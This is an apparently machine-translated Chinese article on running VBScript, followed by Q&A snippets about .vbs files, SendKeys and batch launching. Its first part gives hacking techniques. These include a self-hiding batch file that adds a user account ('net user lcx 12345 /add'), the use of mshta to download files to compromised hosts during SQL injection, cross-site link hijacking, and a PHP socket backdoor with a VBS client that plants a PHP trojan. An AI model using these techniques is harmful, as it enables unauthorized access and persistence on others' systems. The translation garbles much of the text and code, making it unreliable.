vbscript 如何运行（vbscript如何运行）

vbs如何在网页上运行？

vbs有一个类似“SAPI”的对象。SpVoice”，可以用来说英语。默认情况下，该组件可以在xp和2003上使用。打完电话，可以听到一个外国老头在电脑上说话。比如这段代码:●CreateObject(& quot；SAPI。SpVoice & quot).说话& quot我爱你& quot●，另存为vbs后缀，然后双击就能听到英文的我爱你。但是接下来我们谈到了另一个问题，如何运行vbs代码而不保存为vbs或者vbe后缀。

1.使用mshta运行vbs

这类文件hta运行后也是系统权限，它的调用主机是mshta.exe。我们在cmd下运行这行代码:●mshtavsubscript:createobject(” SAPI . sp voice & quot；).说话(& quot我爱你。& quot)(window.close)●，你也会听到同样的发音。这行代码的意思类似于临时生成一个hta文件，然后运行里面的vbs代码，然后调用window.close关闭正在运行的窗口。整个过程看不到hta窗口。你觉得这种操作方式怎么样？至少我想到了两个。一个是批处理的隐藏操作。基本代码如下:

★

@关闭回声

如果& quot% 1 & quot= = & quoth & quot转到开始

mshta VBScript:createobject(& quot；wscript.shell & quot).运行(& quot% ~ nx0h & quot；，0)(window.close)&退出

:开始

Rem开始写下面的批处理代码。

网络用户lcx 12345 /add

★

这段代码只能双击运行，运行过程中看不到具体的批处理过程。我考虑的第二件事是在注射过程中的使用。网上有一篇广为流传的文章《mssql注入中多次调用参数导致多次回显的解决方案》。中心思想是用冒号连接vbs语句，然后用echo命令写一次给注入的肉鸡，然后调用这个vbs下载文件。如果调用mshta执行，下载执行一次就可以了。但是在命令行用mshta直接跟vbs代码有一个很难处理的问题:空。不过用execute把vbs代码放在括号里也是可以的。这位读者可以自己试试。相信我，这并不难。

第二，用ie地址栏运行vbs

很多人会用ie地址栏运行js。其实vbs还是可以的。我们就打开一个网站，在地址栏输入:VBScript:msgbox(document . links . length)，然后回车。我们将在当前页面上看到有多少连接。使用句子document.links(i)。将I改为不同的自然数，如0、1、2、3等。会分别显示不同的链接地址。这部分其实涉及到dhtml。让我们看看最简单的示例代码:

★

& lta href = http://www . Sohu . com & gt；www . Sohu . com & lt；/a & gt；

& lta href = http://www . Baidu . com & gt；www . Baidu . com & lt；/a & gt；

★

这是两个链接。保存为网页后，点击它们会跳转到不同的页面。如果这个页面有一个跨网站，我想破坏它，使用户可以点击www.sohu.com，但去我指定的页面。能做到吗？其实可以只添加一行语句，代码是:●< body onload = VBScript:document . links(0)。href = & quothttp://www . Google . com & quot；:document.links(0)。innerHTML = & quotwww . Sohu . com & quot；& gt●.在这种情况下，用户再次点击搜狐时，实际上会转到谷歌，但原页面的布局丝毫没有受损。相同的dhtml元素包括document.links (i)。href，document.images(i)。src，document.forms(i)。动作等等。跨站点改变它的动态元素很有趣。

第三，调用外部组件运行vbs

毕竟vbs本身功能有限，但是可以和外界很好的互动。如果用vbs模拟nc签约，我们就调用vb组件。关于VBS如何成功呼叫MSWinsock。温索克zzzevazzz说得很清楚。它是。reg导入注册表，用于下载VB6控件的Winsock.ocs注册和授权密钥。这里可以下载两个文件前不久在http://zzzevazzz.bokee.com/inc/vb6controls.rar.，我学了一段时间php，在网上看到一个php监听器，可以当后门。S端s.php代码如下:

★

& lt一端有带圈可握的短马鞭

//设置一些基本变量

$ host = & quot192 . 168 . 8 . 100 quot；;

$ port = 12345

//设置超时。

set _ time _ limit(0)；

//创建一个套接字

$socket = socket_create(AF_INET，SOCK_STREAM，0)或die(& quot；无法创建

插座& quot);

//将套接字绑定到端口

$result = socket_bind($socket，$host，$port)或die(& quot；无法绑定到

插座& quot);

//开始监听链接

$result = socket_listen($socket，3)或die(& quot；无法设置套接字

听众& quot);

//接受传入连接

//另一个套接字来处理通信

$spawn = socket_accept($socket)或die(& quot；无法接受传入

连接& quot);

//获取客户端的输入

$input = socket_read($spawn，1024)或die(& quot；无法读取输入);

//clear 空输入字符串

$ input = trim($ input)；//将输入结果写入ok.php，这是我添加的。

fputs(fopen(ok.php，a

)，& quot$ input & quot);

//处理客户端输入并返回结果

$output = strrev($input)。& quot& quot;

socket_write($spawn，$output，strlen ($output))或die(& quot；无法写入

输出& quot);

//关闭套接字

socket _ close($ spawn)；

socket _ close($ socket)；

马鞭& gt

★

当ie打开这个php时，运行它的服务器会监听12345端口。如果我们使用vbs将合同发送到12345端口，ok.php将在同一个文件的php目录中生成。合同的内容就是我们要写入ok.php的代码。vbs文件c.vbs代码如下:

★

Set ie=WScript。CreateObject(&quotInternetExplorer。申请& quot)

ie.visible=false

即。导航& quothttp://192 . 168 . 8 . 100/s . PHP & quot；S.php是服务器。

而ie。忙碌的

WScript。睡眠100

行

做

Wscript。睡眠200

循环直到ie。ReadyState=4

Set socket=WScript。CreateObject(&quotMSWinsock。Winsock & quot)

插座。协议=0

插座。RemotePort = & quot12345 & quot港口

插座。RemoteHost = & quot192 . 168 . 8 . 100 quot；主机

socket . connect socket . remote host，socket.remoteport连接

WScript.sleep 10

ddd = & quot& lt马鞭phpinfo()；& gt& quot&Chr(13)在这里你可以把它改成一句话的php木马

插座。发送数据ddd

WScript.sleep 100

wscript.echo & quot好的& quot

socket.senddata Chr(13)

插座.关闭

设置ie =无

★

一个vbs和一个php完美匹配，创造了一个非传统的后门。当然这个后门价值不大，重要的是理念。

win10如何查看vbs是否开启？

win10查看vbs是否开启的方法步骤

1.打开win10系统的电脑，然后准备好vbs文件，这里说明一下，所有vbs都可以用记事本打开，不过看到的只是代码，而并不是运行代码的状态，我们要的是vbs真实运行的状态。

2.接着右击vbs文件，在弹出的右键菜单中选择打开方式，有的朋友没有打开方式这个选项，也可以选择属性选项。

3.一般win10系统会自动识别vbs文件，并且自动匹配打开的程序，默认是Microsoft ® Windows Based Script Host，如果自动识别的就可以双击直接运行vbs文件了，没有识别的需要手动来调节。

4.接着说下没有自动匹配程序的情况，同样是在打开方式选择程序的窗口界面，点击下方的更多应用选项。

5.在下方的列表中是没有可以打开的程序，这个时候点击最下面蓝色的文字，也就是在这台电脑上查找其他应用选项，点击打开。

6.接着进入到c盘，然后进入到windowssystem32的文件夹，在里边选择wscript.exe,点击打开即可。

7.接着就可以打开vbs文件了，在桌面可以看到运行的vbs窗口界面了。

用VBS模拟键盘按键？

WshShell.SendKeys “{ENTER}”

模拟键盘操作，将一个或多个按键指令发送到指定Windows窗口来控制应用程序运行。

其使用格式为：object.SendKeys(string)；

object：表示WshShell对象；

string：表示要发送的按键指令字符串，需要放在英文双引号中。

https://iknow-pic.cdn.bcebos.com/908fa0ec08fa513dfc8c11a0326d55fbb2fbd9ae

扩展资料：

基本键：

每个按键由一个或多个字符表示。

为了指定单一键盘字符，必须按字符本身的键。例如，为了表示字母 A，可以用 “A”

为了表示多个字符，就必须在字符后面直接加上另一个字符。例如，要表示 A、B 及 C，可用 “ABC” 作为 string。

部分特殊功能键：

对于需要与Shift、Ctrl、Alt三个控制键组合的按键，SendKeys使用特殊字符来表示：

Shift：WshShell.SendKeys “+”

Ctrl：WshShell.SendKeys “^”

Alt：WshShell.SendKeys “%”

+：WshShell.SendKeys “{+}”

VBS运行程序带参数怎么写？

demoDimaa=inputbox(“请键入参数(PleaseInputtheParameter):”,”Configurationtostart”)wscript.createobject(“wscript.shell”).run(“cmd/kipconfig”&a)运行文件和参数直接写在双引号内。

怎样编写VBS程序，在指定的日期、时间内，运行符合的相应程序？怎样修改，谢谢？

思路是这样（但代码我不写了，手机很不方便，而且字数也不够的）：首先代码中添加本vbs开机自运行（修改注册表），然后用data函数判断是否指定日期，如果不是则wscript.quit，如果是则再用time函数加do循环判断是否到了指定时间，如果不是则继续循环知道为是，如果是则执行相关命令即可。

怎样写vbs批量运行bat文件？

在VBS中，添加多个需要运行的BAT文件即可，示例：

createobject(“wscript.shell”).run “c:test1.bat”,0 ‘其中0表示bat文件以隐藏窗口的方式运行

createobject(“wscript.shell”).run “c:test2.bat”,0

createobject(“wscript.shell”).run “c:test3.bat”,0

createobject(“wscript.shell”).run “c:test4.bat”,0

……